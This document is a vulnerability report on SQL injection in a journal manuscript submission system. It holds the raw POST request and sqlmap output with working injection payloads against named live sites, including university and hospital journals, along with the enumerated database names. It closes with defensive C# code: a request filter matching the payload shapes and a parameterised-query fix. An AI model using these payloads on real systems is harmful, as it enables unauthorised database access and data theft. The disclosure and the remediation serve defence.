General SQL injection vulnerability in a manuscript submission system (affecting many enterprises and schools)
A search turns up many deployments of this system; a few of them were tested:
POST /web/keysearch.aspx HTTP/1.1
Host: www.XXXX.com
User-Agent: Baiduspider
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: pai_lasttime=1410760097025; pai_count=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Case 1: Hunan University http://dxjykx.cnmanu.cn/
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1%' AND 9293=CONVERT(INT,(select char(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (case when (9293=9293) then char(49) else char(48) END)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: author=1%' union all select null, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(100)+CHAR(74)+CHAR(79)+CHAR(71)+CHAR(115)+CHAR(88)+CHAR(77)+CHAR(80)+CHAR(88)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), NULL-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1%'; waitfor delay '0:0:5'-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1%' waitfor delay '0:0:5'-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: keyword
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd%' AND 4223=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (case when (4223=4223) then char(49) else char(48) END)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (78) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd%' union all select 78, 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(75)+CHAR(90)+CHAR(88)+CHAR(113)+CHAR(110)+CHAR(103)+CHAR(76)+CHAR(85)+CHAR(80)+CHAR(114)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: title
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 4163=CONVERT(INT,(select char(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (case when (4163=4163) then char(49) else char(48) END)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='

    Type: UNION query
    Title: Generic UNION query (78) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' union all select 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(108)+CHAR(97)+CHAR(79)+CHAR(74)+CHAR(71)+CHAR(110)+CHAR(69)+CHAR(116)+CHAR(108)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), 78--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[Q] Quit
>
[13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server
Web server operating system: Windows 2003
Web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
Back-end DBMS: Microsoft SQL Server 2000
[13:41:08] [INFO] testing if current user is DBA
Current user is DBA: False
[13:41:08] [INFO] fetching database names
[13:41:08] [INFO] the SQL query used returns 59 entries
Available databases [59]:
[*] Bl
[*] Cdxxgc
[*] Cg
[*] Cghy
[*] Cy
[*] Cymx
[*] D1
[*] Demcom
[*] Demo
[*] Dj
[*] Dxjykx
[*] Eye
[*] Gjzhyx
[*] GuaHao
[*] Hh
[*] Hhzrkx
[*] Hlgl
[*] Hnxbyx
[*] Hxyqdz
[*] J4e
[*] Jjyx
[*] Lcjsyx
[*] Lcjyzzs
[*] Lcsjbx
[*] Lcsjwk
[*] Lnyxybj
[*] Main
[*] Master
[*] Mfskin
[*] Model
[*] Mrzxwk
[*] Msdb
[*] Mz
[*] Mzyfs
[*] Njsd
[*] Nky
[*] Northwind
[*] Nxgb
[*] Nydxxb
[*] Pifu
[*] Pubs
[*] Rfic
[*] SMS
[*] St
[*] Sypfb
[*] Tempdb
[*] Test
[*] Wcbx
[*] Wf
[*] Wlxb
[*] Xdx
[*] Xhnj
[*] Xjyx
[*] Xnxyxb
[*] Yxjz
[*] Zdblx
[*] Zjyx
[*] Zr
[*] Zxy.pdf
[13:41:08] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\Output\dxjykx.cnmanu.cn'
[*] Shutting down at 13:41:08
Case 2: Renji Hospital, Shanghai Jiao Tong University School of Medicine, http://www.cjge-manuscriptcentral.com
D:\Python27\sqlmap>sqlmap.py -r 1.txt --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] Starting at: 13:25:16
[13:25:16] [INFO] parsing HTTP request from '1.txt'
[13:25:16] [INFO] using 'd:\Python27\sqlmap\output\www.cjge-manuscriptcentral.com\session' as session file
[13:25:16] [INFO] resuming injection data from session file
[13:25:16] [INFO] resuming back-end DBMS 'Microsoft SQL server 100' from session file
[13:25:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: author
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1'; waitfor delay '0:0:5';-- AND 'enfs'='enfs&butSearch=Query&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1' waitfor delay '0:0:5'-- AND 'exwq'='exwq&butSearch=query&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.
---
[13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server
Web server operating system: Windows 2003
Web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
Back-end DBMS: Microsoft SQL Server 2000
[13:25:17] [INFO] fetching database names
[13:25:17] [INFO] fetching number of databases
[13:25:17] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
59
[13:25:47] [INFO] retrieved:
[13:25:52] [WARNING] adjusting time delay to 1 second
Bl
[13:26:33] [INFO] retrieved: cdxxgc
[13:27:12] [INFO] retrieved: cg
[13:27:25] [INFO] retrieved: cghy
[13:27:51] [INFO] retrieved: cy
[13:28:03] [INFO] retrieved: cymx
[13:28:30] [INFO] retrieved: d1
[13:28:42] [INFO] retrieved: demcom
[13:29:18] [INFO] retrieved: demo
[13:29:44] [INFO] retrieved: dj
[13:29:58] [INFO] retrieved: dxjykx
[13:30:39] [INFO] retrieved: Eye
[13:30:56] [INFO] retrieved: gjzhyx
[13:31:38] [INFO] retrieved: GuaHao
[13:32:13] [INFO] retrieved: hh
[13:32:30] [INFO] retrieved: hhzrkx
[13:33:13] [INFO] retrieved: hlgl
[13:33:43] [INFO] retrieved: hnxbyx
[13:34:26] [INFO] retrieved: hxyqdz
[13:35:07] [INFO] retrieved: j4e
[13:35:27] [INFO] retrieved: jjyx
[13:35:55] [INFO] retrieved: lcjsyx
[13:36:35] [INFO] retrieved: lcjyzzs
[13:37:23] [INFO] retrieved: lcsjbx
Without even re-detecting the vulnerability, the database information can still be obtained!
Case 3: a Chinese cosmetic and plastic surgery journal, mr.cnmanu.cn
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: title
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' AND 7683=CONVERT(INT,(select char(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (case when (7683=7683) then char(49) else char(48) END)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='

    Type: UNION query
    Title: Generic UNION query (41) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' union all select 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(76)+CHAR(69)+CHAR(116)+CHAR(66)+CHAR(113)+CHAR(78)+CHAR(71)+CHAR(76)+CHAR(75)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58), 41--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%'; waitfor delay '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf%' waitfor delay '0:0:5'--

Place: POST
Parameter: keyword
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1&butSearch=??&keyword=assd%' AND 2981=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (case when (2981=2981) then char(49) else char(48) END)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (41) - 6 columns
    Payload: author=1&butSearch=??&keyword=assd%' union all select 41, 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(122)+CHAR(72)+CHAR(105)+CHAR(70)+CHAR(111)+CHAR(73)+CHAR(83)+CHAR(98)+CHAR(117)+CHAR(100)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1&butSearch=??&keyword=assd%'; waitfor delay '0:0:5'-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1&butSearch=??&keyword=assd%' waitfor delay '0:0:5'-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

Place: POST
Parameter: author
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: author=1%' AND 6529=CONVERT(INT,(select char(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (case when (6529=6529) then char(49) else char(48) END)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: author=1%' union all select null, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(119)+CHAR(119)+CHAR(101)+CHAR(76)+CHAR(87)+CHAR(114)+CHAR(81)+CHAR(75)+CHAR(70)+CHAR(71)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: author=1%'; waitfor delay '0:0:5'-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: author=1%' waitfor delay '0:0:5'-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[Q] Quit
>
[13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server
Web server operating system: Windows 2003
Web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
Back-end DBMS: Microsoft SQL Server 2000
[13:40:55] [INFO] testing if current user is DBA
Current user is DBA: False
[13:40:55] [INFO] fetching database names
[13:40:55] [INFO] the SQL query used returns 59 entries
Available databases [59]:
[*] Bl
[*] Cdxxgc
[*] Cg
[*] Cghy
[*] Cy
[*] Cymx
[*] D1
[*] Demcom
[*] Demo
[*] Dj
[*] Dxjykx
[*] Eye
[*] Gjzhyx
[*] GuaHao
[*] Hh
[*] Hhzrkx
[*] Hlgl
[*] Hnxbyx
[*] Hxyqdz
[*] J4e
[*] Jjyx
[*] Lcjsyx
[*] Lcjyzzs
[*] Lcsjbx
[*] Lcsjwk
[*] Lnyxybj
[*] Main
[*] Master
[*] Mfskin
[*] Model
[*] Mrzxwk
[*] Msdb
[*] Mz
[*] Mzyfs
[*] Njsd
[*] Nky
[*] Northwind
[*] Nxgb
[*] Nydxxb
[*] Pifu
[*] Pubs
[*] Rfic
[*] SMS
[*] St
[*] Sypfb
[*] Tempdb
[*] Test
[*] Wcbx
[*] Wf
[*] Wlxb
[*] Xdx
[*] Xhnj
[*] Xjyx
[*] Xnxyxb
[*] Yxjz
[*] Zdblx
[*] Zjyx
[*] Zr
[*] Zxy.pdf
[13:40:55] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\Output\mr.cnmanu.cn'
[*] Shutting down at 13:40:55
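The sqlmap output above is also a detection source for the people running these sites: every probe family it lists has a recognisable shape in the POST body (waitfor delay for the stacked and time-based checks, CONVERT(INT,(SELECT ... for the error-based check, union all select for the UNION check, and long CHAR(n)+CHAR(n) chains that spell sqlmap's random delimiters, ":mip:" and ":sau:" in case 1). The following ASP.NET 2.0 IHttpModule is an added example written for this page, not code from the cnmanu.cn system; it inspects POST bodies for those shapes, writes one log line per hit and rejects the request. The class name, the "Security" trace category and the response text are my own choices.

```csharp
// Added example for this page; NOT code from the cnmanu.cn system.
// ASP.NET 2.0 request filter that flags the probe shapes seen in the sqlmap output
// and rejects them before keysearch.aspx runs. Class name and log category are assumed.
using System;
using System.Collections.Specialized;
using System.Diagnostics;
using System.Text.RegularExpressions;
using System.Web;

public class SqliProbeModule : IHttpModule
{
    // One signature per payload family reported by sqlmap on this page:
    //   stacked / time-based  -> "; waitfor delay '0:0:5'--"
    //   error-based           -> "AND 9293=CONVERT(INT,(SELECT CHAR(58)+..."
    //   UNION                 -> "union all select 78, 78, ..."
    //   delimiter strings     -> runs of CHAR(n)+CHAR(n)+... (":mip:", ":sau:")
    //   boolean tautology     -> "' AND 4223=4223"
    private static readonly Regex[] Signatures = new Regex[] {
        new Regex(@"waitfor\s+delay\s+'",                  RegexOptions.IgnoreCase | RegexOptions.Compiled),
        new Regex(@"\bconvert\s*\(\s*int\s*,",             RegexOptions.IgnoreCase | RegexOptions.Compiled),
        new Regex(@"\bunion\s+(all\s+)?select\b",          RegexOptions.IgnoreCase | RegexOptions.Compiled),
        new Regex(@"(\bchar\s*\(\s*\d+\s*\)\s*\+\s*){3,}", RegexOptions.IgnoreCase | RegexOptions.Compiled),
        new Regex(@"'\s*(and|or)\s+\d+\s*=\s*\d+",         RegexOptions.IgnoreCase | RegexOptions.Compiled),
    };

    public void Init(HttpApplication app)
    {
        app.BeginRequest += new EventHandler(OnBeginRequest);
    }

    public void Dispose() { }

    private static void OnBeginRequest(object sender, EventArgs e)
    {
        HttpApplication app = (HttpApplication)sender;
        HttpRequest req = app.Context.Request;
        if (req.HttpMethod != "POST") return;

        string hit = FirstMatch(req.Form);
        if (hit == null) return;

        // One line per rejected request: source, path, parameter and the matched
        // fragment only, so the log stays readable and never stores whole bodies.
        Trace.WriteLine(string.Format("sqli-probe src={0} path={1} {2}",
                                      req.UserHostAddress, req.Path, hit), "Security");

        app.Context.Response.StatusCode = 400;
        app.Context.Response.Write("Bad request");
        app.CompleteRequest();   // end the pipeline; the page handler never sees the body
    }

    // Returns "param=<matched fragment>" for the first form field that matches a
    // signature, or null when the body looks clean. Public so it can be unit-tested
    // with a NameValueCollection built by hand.
    public static string FirstMatch(NameValueCollection form)
    {
        if (form == null) return null;
        foreach (string key in form.AllKeys)
        {
            if (key == null) continue;
            string value = form[key] ?? "";
            foreach (Regex sig in Signatures)
            {
                Match m = sig.Match(value);
                if (m.Success) return key + "=" + m.Value;
            }
        }
        return null;
    }
}
```

Register it in web.config under system.web as `<httpModules><add name="SqliProbe" type="SqliProbeModule" /></httpModules>` (IIS 6 runs the classic pipeline). Treat the "sqli-probe" trace line as the alert, and count on the rejection only as defense in depth: a signature list can be evaded and will occasionally block a legitimate search that happens to contain these words, so the actual fix is still parameterised queries in the page itself. Turning on custom error pages (customErrors mode="On") separately removes the error text that the error-based check reads back, but does nothing against the UNION and time-based channels also listed above.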
Solution:
Fixing this is relatively simple. Global filtering of the multiple POST parameters
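The report does not include the page's source, but the payload shape tells us how the query is built: author=1%' AND ... AND '%'=' only works if the value is dropped into a LIKE '%...%' literal and can close the quote. The following is an added example, not the cnmanu.cn code, that reconstructs that concatenation pattern next to a parameterised rewrite with SqlCommand for the same search. The table and column names (Manuscript, Author, Keywords, Title, Year, Issue) are assumptions.

```csharp
// Added example for this page; NOT the cnmanu.cn source, which the report does not show.
// Table/column names are assumptions; the query shape is inferred from the sqlmap payloads.
using System;
using System.Collections.Specialized;
using System.Data;
using System.Data.SqlClient;

public static class KeySearch
{
    // BEFORE (the pattern the payloads imply): every field is spliced into the SQL text.
    // The value lands inside LIKE '%...%', so "1%' AND ... AND '%'='" closes the quote,
    // runs arbitrary SQL, and reopens it; "'; waitfor delay" works the same way.
    public static string BuildVulnerableSql(string author, string keyword, string title,
                                            string year, string issue)
    {
        string sql = "SELECT TOP 100 Id, Title, Author, Year, Issue FROM Manuscript WHERE 1=1";
        if (author != "")  sql += " AND Author LIKE '%" + author + "%'";
        if (keyword != "") sql += " AND Keywords LIKE '%" + keyword + "%'";
        if (title != "")   sql += " AND Title LIKE '%" + title + "%'";
        sql += " AND Year = " + year + " AND Issue = " + issue;   // numbers spliced in too
        return sql;
    }

    // AFTER: the SQL text is constant and every user value travels as a typed parameter.
    // The wildcards are added on the SQL side, and LIKE metacharacters in the user text
    // are escaped so they match literally. LIKE ... ESCAPE is available on SQL Server 2000.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string author, string keyword,
                                              string title, int year, int issue)
    {
        SqlCommand cmd = conn.CreateCommand();
        cmd.CommandType = CommandType.Text;
        cmd.CommandText =
            "SELECT TOP 100 Id, Title, Author, Year, Issue FROM Manuscript " +
            "WHERE (@author = ''  OR Author   LIKE '%' + @author  + '%' ESCAPE '\\') " +
            "  AND (@keyword = '' OR Keywords LIKE '%' + @keyword + '%' ESCAPE '\\') " +
            "  AND (@title = ''   OR Title    LIKE '%' + @title   + '%' ESCAPE '\\') " +
            "  AND Year = @year AND Issue = @issue";
        cmd.Parameters.Add("@author",  SqlDbType.NVarChar, 100).Value = EscapeLike(author);
        cmd.Parameters.Add("@keyword", SqlDbType.NVarChar, 100).Value = EscapeLike(keyword);
        cmd.Parameters.Add("@title",   SqlDbType.NVarChar, 200).Value = EscapeLike(title);
        cmd.Parameters.Add("@year",    SqlDbType.Int).Value = year;
        cmd.Parameters.Add("@issue",   SqlDbType.Int).Value = issue;
        return cmd;
    }

    // Make \ % _ and [ in user text match themselves under ESCAPE '\'.
    public static string EscapeLike(string s)
    {
        return (s ?? "").Replace("\\", "\\\\").Replace("%", "\\%")
                        .Replace("_", "\\_").Replace("[", "\\[");
    }

    // Call site (keysearch.aspx code-behind): Nian and Qi must parse as integers before
    // they reach the database; null tells the caller to answer 400 Bad Request.
    public static SqlCommand FromForm(SqlConnection conn, NameValueCollection form)
    {
        int year, issue;
        if (!int.TryParse(form["Nian"], out year) || !int.TryParse(form["Qi"], out issue))
            return null;
        return BuildSafeCommand(conn, form["author"] ?? "", form["keyword"] ?? "",
                                form["title"] ?? "", year, issue);
    }
}
```

With the parameterised version none of the three reported parameters (author, keyword, title) can leave the string literal, so the error-based, UNION, stacked and time-based payloads listed above all become ordinary search text; the numeric fields are rejected up front instead of being concatenated.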